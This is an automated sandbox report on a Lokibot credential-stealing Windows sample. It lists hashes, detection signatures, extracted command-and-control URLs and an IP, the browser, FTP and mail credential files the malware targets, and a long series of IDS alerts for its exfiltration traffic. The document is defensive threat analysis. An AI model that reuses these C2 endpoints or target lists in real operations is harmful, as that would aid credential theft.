Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
vNcHHC1HKe

Overview

General Information

Sample Name:vNcHHC1HKe (renamed file extension from none to exe)
Analysis ID:620804
MD5:8c7e9d4d5f172854a531a86d34af2c8c
SHA1:43d99c2bf4d5fce1b640b4ee65b234ced6292c35
SHA256:7eaffbf0e048501f710bef50d95d59870d638c7e64225397f1ae1d03014c8b19
Tags:32exetrojan
Infos:

Detection

Lokibot
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Yara detected Lokibot
Antivirus detection for URL or domain
Snort IDS alert for network traffic
Tries to steal Mail credentials (via file / registry access)
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Yara detected aPLib compressed binary
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file registry)
Machine Learning detection for sample
Injects a PE file into a foreign processes
Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)
C2 URLs / IPs found in malware configuration
Tries to harvest and steal browser information (history, passwords, etc)
Uses 32bit PE files
Yara signature match
May sleep (evasive loops) to hinder dynamic analysis
Contains functionality to shutdown / reboot the system
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Yara detected Credential Stealer
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Enables debug privileges
Drops PE files
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Dropped file seen in connection with other malware
Creates a process in suspended mode (likely to inject code)
Contains functionality for read data from the clipboard

Classification

  • System is w10x64
  • vNcHHC1HKe.exe (PID: 6988 cmdline: "C:\Users\user\Desktop\vNcHHC1HKe.exe" MD5: 8C7E9D4D5F172854A531A86D34AF2C8C)
    • dtlrkp.exe (PID: 7032 cmdline: C:\Users\user\AppData\Local\Temp\dtlrkp.exe C:\Users\user\AppData\Local\Temp\hzuplybmb MD5: 8B30D9F0EE85F71C5599DCB7701CE2D8)
      • dtlrkp.exe (PID: 7056 cmdline: C:\Users\user\AppData\Local\Temp\dtlrkp.exe C:\Users\user\AppData\Local\Temp\hzuplybmb MD5: 8B30D9F0EE85F71C5599DCB7701CE2D8)
  • cleanup
{"C2 list": ["http://kbfvzoboss.bid/alien/fre.php", "http://alphastand.trade/alien/fre.php", "http://alphastand.win/alien/fre.php", "http://alphastand.top/alien/fre.php"]}
SourceRuleDescriptionAuthorStrings
00000003.00000000.370974259.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
    00000003.00000000.370974259.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_aPLib_compressed_binaryYara detected aPLib compressed binaryJoe Security
      00000003.00000000.370974259.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_LokibotYara detected LokibotJoe Security
        00000003.00000000.370974259.0000000000400000.00000040.00000400.00020000.00000000.sdmpINDICATOR_SUSPICIOUS_GENInfoStealerDetects executables containing common artifcats observed in infostealersditekSHen
        • 0x17936:$f1: FileZilla\recentservers.xml
        • 0x17976:$f2: FileZilla\sitemanager.xml
        • 0x15be6:$b2: Mozilla\Firefox\Profiles
        • 0x15950:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2
        • 0x15afa:$s4: logins.json
        • 0x169a4:$s6: wand.dat
        • 0x15424:$a1: username_value
        • 0x15414:$a2: password_value
        • 0x15a5f:$a3: encryptedUsername
        • 0x15acc:$a3: encryptedUsername
        • 0x15a72:$a4: encryptedPassword
        • 0x15ae0:$a4: encryptedPassword
        00000003.00000000.370974259.0000000000400000.00000040.00000400.00020000.00000000.sdmpLoki_1Loki Payloadkevoreilly
        • 0x151b4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW
        • 0x153fc:$a2: last_compatible_version
        Click to see the 35 entries
        SourceRuleDescriptionAuthorStrings
        3.0.dtlrkp.exe.400000.4.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          3.0.dtlrkp.exe.400000.4.unpackJoeSecurity_aPLib_compressed_binaryYara detected aPLib compressed binaryJoe Security
            3.0.dtlrkp.exe.400000.4.unpackJoeSecurity_LokibotYara detected LokibotJoe Security
              3.0.dtlrkp.exe.400000.4.unpackINDICATOR_SUSPICIOUS_GENInfoStealerDetects executables containing common artifcats observed in infostealersditekSHen
              • 0x16536:$f1: FileZilla\recentservers.xml
              • 0x16576:$f2: FileZilla\sitemanager.xml
              • 0x147e6:$b2: Mozilla\Firefox\Profiles
              • 0x14550:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2
              • 0x146fa:$s4: logins.json
              • 0x155a4:$s6: wand.dat
              • 0x14024:$a1: username_value
              • 0x14014:$a2: password_value
              • 0x1465f:$a3: encryptedUsername
              • 0x146cc:$a3: encryptedUsername
              • 0x14672:$a4: encryptedPassword
              • 0x146e0:$a4: encryptedPassword
              3.0.dtlrkp.exe.400000.4.unpackLoki_1Loki Payloadkevoreilly
              • 0x13db4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW
              • 0x13ffc:$a2: last_compatible_version
              Click to see the 76 entries
              No Sigma rule has matched
              Timestamp:05/05/22-09:03:09.858142 05/05/22-09:03:09.858142
              SID:2825766
              Source Port:49768
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/05/22-09:04:35.877050 05/05/22-09:04:35.877050
              SID:2025483
              Source Port:80
              Destination Port:49829
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/05/22-09:03:36.699615 05/05/22-09:03:36.699615
              SID:2825766
              Source Port:49785
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/05/22-09:04:28.261969 05/05/22-09:04:28.261969
              SID:2825766
              Source Port:49823
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/05/22-09:04:39.957450 05/05/22-09:04:39.957450
              SID:2025483
              Source Port:80
              Destination Port:49852
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/05/22-09:04:12.471516 05/05/22-09:04:12.471516
              SID:2825766
              Source Port:49813
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/05/22-09:03:12.937504 05/05/22-09:03:12.937504
              SID:2025483
              Source Port:80
              Destination Port:49769
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/05/22-09:03:07.037195 05/05/22-09:03:07.037195
              SID:2825766
              Source Port:49767
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/05/22-09:03:21.002482 05/05/22-09:03:21.002482
              SID:2825766
              Source Port:49775
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/05/22-09:04:10.170641 05/05/22-09:04:10.170641
              SID:2825766
              Source Port:49810
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/05/22-09:04:35.796885 05/05/22-09:04:35.796885
              SID:2825766
              Source Port:49829
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/05/22-09:03:15.560942 05/05/22-09:03:15.560942
              SID:2825766
              Source Port:49771
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/05/22-09:04:38.680257 05/05/22-09:04:38.680257
              SID:2825766
              Source Port:49843
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/05/22-09:03:53.769658 05/05/22-09:03:53.769658
              SID:2025483
              Source Port:80
              Destination Port:49800
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/05/22-09:04:39.884991 05/05/22-09:04:39.884991
              SID:2825766
              Source Port:49852
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/05/22-09:03:59.720062 05/05/22-09:03:59.720062
              SID:2825766
              Source Port:49805
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/05/22-09:04:13.541988 05/05/22-09:04:13.541988
              SID:2825766
              Source Port:49814
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/05/22-09:03:28.128087 05/05/22-09:03:28.128087
              SID:2825766
              Source Port:49780
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/05/22-09:03:23.816864 05/05/22-09:03:23.816864
              SID:2025483
              Source Port:80
              Destination Port:49777
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/05/22-09:03:34.422181 05/05/22-09:03:34.422181
              SID:2025483
              Source Port:80
              Destination Port:49782
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/05/22-09:04:28.342609 05/05/22-09:04:28.342609
              SID:2025483
              Source Port:80
              Destination Port:49823
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/05/22-09:04:55.790210 05/05/22-09:04:55.790210
              SID:2825766
              Source Port:49888
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/05/22-09:04:08.408376 05/05/22-09:04:08.408376
              SID:2025483
              Source Port:80
              Destination Port:49809
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/05/22-09:04:59.232856 05/05/22-09:04:59.232856
              SID:2825766
              Source Port:49889
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/05/22-09:03:50.056619 05/05/22-09:03:50.056619
              SID:2025483
              Source Port:80
              Destination Port:49795
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/05/22-09:03:38.754662 05/05/22-09:03:38.754662
              SID:2025483
              Source Port:80
              Destination Port:49786
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/05/22-09:04:16.734863 05/05/22-09:04:16.734863
              SID:2025483
              Source Port:80
              Destination Port:49817
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/05/22-09:04:49.277684 05/05/22-09:04:49.277684
              SID:2825766
              Source Port:49878
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/05/22-09:03:15.634564 05/05/22-09:03:15.634564
              SID:2025483
              Source Port:80
              Destination Port:49771
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/05/22-09:03:41.636991 05/05/22-09:03:41.636991
              SID:2825766
              Source Port:49789
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/05/22-09:04:23.251156 05/05/22-09:04:23.251156
              SID:2825766
              Source Port:49820
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/05/22-09:04:08.330586 05/05/22-09:04:08.330586
              SID:2825766
              Source Port:49809
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/05/22-09:04:19.274633 05/05/22-09:04:19.274633
              SID:2025483
              Source Port:80
              Destination Port:49818
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/05/22-09:04:52.517389 05/05/22-09:04:52.517389
              SID:2025483
              Source Port:80
              Destination Port:49884
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/05/22-09:03:19.667259 05/05/22-09:03:19.667259
              SID:2825766
              Source Port:49774
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/05/22-09:03:19.744928 05/05/22-09:03:19.744928
              SID:2025483
              Source Port:80
              Destination Port:49774
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/05/22-09:03:59.790812 05/05/22-09:03:59.790812
              SID:2025483
              Source Port:80
              Destination Port:49805
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/05/22-09:03:53.694089 05/05/22-09:03:53.694089
              SID:2825766
              Source Port:49800
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/05/22-09:03:32.413288 05/05/22-09:03:32.413288
              SID:2025483
              Source Port:80
              Destination Port:49781
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/05/22-09:04:13.632225 05/05/22-09:04:13.632225
              SID:2025483
              Source Port:80
              Destination Port:49814
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/05/22-09:04:31.539372 05/05/22-09:04:31.539372
              SID:2025483
              Source Port:80
              Destination Port:49824
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/05/22-09:04:34.327413 05/05/22-09:04:34.327413
              SID:2825766
              Source Port:49826
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/05/22-09:04:15.192814 05/05/22-09:04:15.192814
              SID:2825766
              Source Port:49815
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/05/22-09:04:31.451012 05/05/22-09:04:31.451012
              SID:2825766
              Source Port:49824
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/05/22-09:04:02.283800 05/05/22-09:04:02.283800
              SID:2825766
              Source Port:49806
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/05/22-09:04:46.075139 05/05/22-09:04:46.075139
              SID:2025483
              Source Port:80
              Destination Port:49870
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/05/22-09:03:18.553557 05/05/22-09:03:18.553557
              SID:2025483
              Source Port:80
              Destination Port:49773
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/05/22-09:04:04.665456 05/05/22-09:04:04.665456
              SID:2825766
              Source Port:49807
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/05/22-09:03:21.096855 05/05/22-09:03:21.096855
              SID:2025483
              Source Port:80
              Destination Port:49775
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/05/22-09:03:41.723970 05/05/22-09:03:41.723970
              SID:2025483
              Source Port:80
              Destination Port:49789
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/05/22-09:04:41.937804 05/05/22-09:04:41.937804
              SID:2025483
              Source Port:80
              Destination Port:49860
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/05/22-09:04:04.748843 05/05/22-09:04:04.748843
              SID:2025483
              Source Port:80
              Destination Port:49807
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/05/22-09:04:37.500711 05/05/22-09:04:37.500711
              SID:2025483
              Source Port:80
              Destination Port:49836
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/05/22-09:04:41.860008 05/05/22-09:04:41.860008
              SID:2825766
              Source Port:49860
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/05/22-09:03:12.865476 05/05/22-09:03:12.865476
              SID:2825766
              Source Port:49769
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/05/22-09:04:23.331387 05/05/22-09:04:23.331387
              SID:2025483
              Source Port:80
              Destination Port:49820
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/05/22-09:04:11.254199 05/05/22-09:04:11.254199
              SID:2825766
              Source Port:49812
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/05/22-09:04:37.419767 05/05/22-09:04:37.419767
              SID:2825766
              Source Port:49836
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/05/22-09:04:02.366760 05/05/22-09:04:02.366760
              SID:2025483
              Source Port:80
              Destination Port:49806
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/05/22-09:03:36.774475 05/05/22-09:03:36.774475
              SID:2025483
              Source Port:80
              Destination Port:49785
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/05/22-09:03:28.213243 05/05/22-09:03:28.213243
              SID:2025483
              Source Port:80
              Destination Port:49780
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/05/22-09:04:34.426102 05/05/22-09:04:34.426102
              SID:2025483
              Source Port:80
              Destination Port:49826
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/05/22-09:04:52.431554 05/05/22-09:04:52.431554
              SID:2825766
              Source Port:49884
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/05/22-09:04:11.362368 05/05/22-09:04:11.362368
              SID:2025483
              Source Port:80
              Destination Port:49812
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/05/22-09:04:59.311464 05/05/22-09:04:59.311464
              SID:2025483
              Source Port:80
              Destination Port:49889
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/05/22-09:04:15.285620 05/05/22-09:04:15.285620
              SID:2025483
              Source Port:80
              Destination Port:49815
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/05/22-09:04:26.555558 05/05/22-09:04:26.555558
              SID:2825766
              Source Port:49822
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/05/22-09:03:38.682237 05/05/22-09:03:38.682237
              SID:2825766
              Source Port:49786
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/05/22-09:04:19.192332 05/05/22-09:04:19.192332
              SID:2825766
              Source Port:49818
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/05/22-09:03:14.097517 05/05/22-09:03:14.097517
              SID:2825766
              Source Port:49770
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/05/22-09:04:49.395443 05/05/22-09:04:49.395443
              SID:2025483
              Source Port:80
              Destination Port:49878
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/05/22-09:03:44.385995 05/05/22-09:03:44.385995
              SID:2825766
              Source Port:49794
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/05/22-09:04:26.632343 05/05/22-09:04:26.632343
              SID:2025483
              Source Port:80
              Destination Port:49822
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/05/22-09:03:17.152559 05/05/22-09:03:17.152559
              SID:2825766
              Source Port:49772
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/05/22-09:04:10.259654 05/05/22-09:04:10.259654
              SID:2025483
              Source Port:80
              Destination Port:49810
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/05/22-09:03:34.349918 05/05/22-09:03:34.349918
              SID:2825766
              Source Port:49782
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/05/22-09:04:16.658933 05/05/22-09:04:16.658933
              SID:2825766
              Source Port:49817
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/05/22-09:03:49.975068 05/05/22-09:03:49.975068
              SID:2825766
              Source Port:49795
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/05/22-09:03:14.179365 05/05/22-09:03:14.179365
              SID:2025483
              Source Port:80
              Destination Port:49770
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/05/22-09:04:55.868892 05/05/22-09:04:55.868892
              SID:2025483
              Source Port:80
              Destination Port:49888
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/05/22-09:03:17.233312 05/05/22-09:03:17.233312
              SID:2025483
              Source Port:80
              Destination Port:49772
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/05/22-09:03:23.742147 05/05/22-09:03:23.742147
              SID:2825766
              Source Port:49777
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/05/22-09:04:12.550162 05/05/22-09:04:12.550162
              SID:2025483
              Source Port:80
              Destination Port:49813
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/05/22-09:03:32.333463 05/05/22-09:03:32.333463
              SID:2825766
              Source Port:49781
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/05/22-09:03:44.460093 05/05/22-09:03:44.460093
              SID:2025483
              Source Port:80
              Destination Port:49794
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/05/22-09:04:38.761471 05/05/22-09:04:38.761471
              SID:2025483
              Source Port:80
              Destination Port:49843
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/05/22-09:03:18.475481 05/05/22-09:03:18.475481
              SID:2825766
              Source Port:49773
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/05/22-09:04:45.993104 05/05/22-09:04:45.993104
              SID:2825766
              Source Port:49870
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Source: 00000003.00000002.626023064.0000000000400000.00000040.00000400.00020000.00000000.sdmpMalware Configuration Extractor: Lokibot {"C2 list": ["http://kbfvzoboss.bid/alien/fre.php", "http://alphastand.trade/alien/fre.php", "http://alphastand.win/alien/fre.php", "http://alphastand.top/alien/fre.php"]}
              Source: vNcHHC1HKe.exeVirustotal: Detection: 32%Perma Link
              Source: vNcHHC1HKe.exeReversingLabs: Detection: 47%
              Source: http://37.0.11.227/sarag/five/fre.phpAvira URL Cloud: Label: malware
              Source: vNcHHC1HKe.exeJoe Sandbox ML: detected
              Source: vNcHHC1HKe.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
              Source: vNcHHC1HKe.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
              Source: Binary string: wntdll.pdbUGP source: dtlrkp.exe, 00000001.00000003.371082188.00000000020A0000.00000004.00001000.00020000.00000000.sdmp, dtlrkp.exe, 00000001.00000003.378532429.0000000002230000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: wntdll.pdb source: dtlrkp.exe, 00000001.00000003.371082188.00000000020A0000.00000004.00001000.00020000.00000000.sdmp, dtlrkp.exe, 00000001.00000003.378532429.0000000002230000.00000004.00001000.00020000.00000000.sdmp
              Source: C:\Users\user\Desktop\vNcHHC1HKe.exeCode function: 0_2_00405C13 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,
              Source: C:\Users\user\Desktop\vNcHHC1HKe.exeCode function: 0_2_0040683D FindFirstFileW,FindClose,
              Source: C:\Users\user\Desktop\vNcHHC1HKe.exeCode function: 0_2_0040290B FindFirstFileW,
              Source: C:\Users\user\AppData\Local\Temp\dtlrkp.exeCode function: 3_2_00403D74 FindFirstFileW,FindNextFileW,FindFirstFileW,FindNextFileW,

              Networking

              barindex
              Source: TrafficSnort IDS: 2024312 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1 192.168.2.6:49767 -> 37.0.11.227:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49767 -> 37.0.11.227:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49767 -> 37.0.11.227:80
              Source: TrafficSnort IDS: 2024317 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2 192.168.2.6:49767 -> 37.0.11.227:80
              Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.6:49767 -> 37.0.11.227:80
              Source: TrafficSnort IDS: 2024312 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1 192.168.2.6:49768 -> 37.0.11.227:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49768 -> 37.0.11.227:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49768 -> 37.0.11.227:80
              Source: TrafficSnort IDS: 2024317 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2 192.168.2.6:49768 -> 37.0.11.227:80
              Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.6:49768 -> 37.0.11.227:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49769 -> 37.0.11.227:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49769 -> 37.0.11.227:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49769 -> 37.0.11.227:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49769 -> 37.0.11.227:80
              Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.6:49769 -> 37.0.11.227:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 37.0.11.227:80 -> 192.168.2.6:49769
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49770 -> 37.0.11.227:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49770 -> 37.0.11.227:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49770 -> 37.0.11.227:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49770 -> 37.0.11.227:80
              Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.6:49770 -> 37.0.11.227:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 37.0.11.227:80 -> 192.168.2.6:49770
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49771 -> 37.0.11.227:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49771 -> 37.0.11.227:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49771 -> 37.0.11.227:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49771 -> 37.0.11.227:80
              Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.6:49771 -> 37.0.11.227:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 37.0.11.227:80 -> 192.168.2.6:49771
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49772 -> 37.0.11.227:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49772 -> 37.0.11.227:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49772 -> 37.0.11.227:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49772 -> 37.0.11.227:80
              Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.6:49772 -> 37.0.11.227:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 37.0.11.227:80 -> 192.168.2.6:49772
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49773 -> 37.0.11.227:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49773 -> 37.0.11.227:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49773 -> 37.0.11.227:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49773 -> 37.0.11.227:80
              Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.6:49773 -> 37.0.11.227:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 37.0.11.227:80 -> 192.168.2.6:49773
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49774 -> 37.0.11.227:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49774 -> 37.0.11.227:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49774 -> 37.0.11.227:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49774 -> 37.0.11.227:80
              Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.6:49774 -> 37.0.11.227:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 37.0.11.227:80 -> 192.168.2.6:49774
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49775 -> 37.0.11.227:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49775 -> 37.0.11.227:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49775 -> 37.0.11.227:80
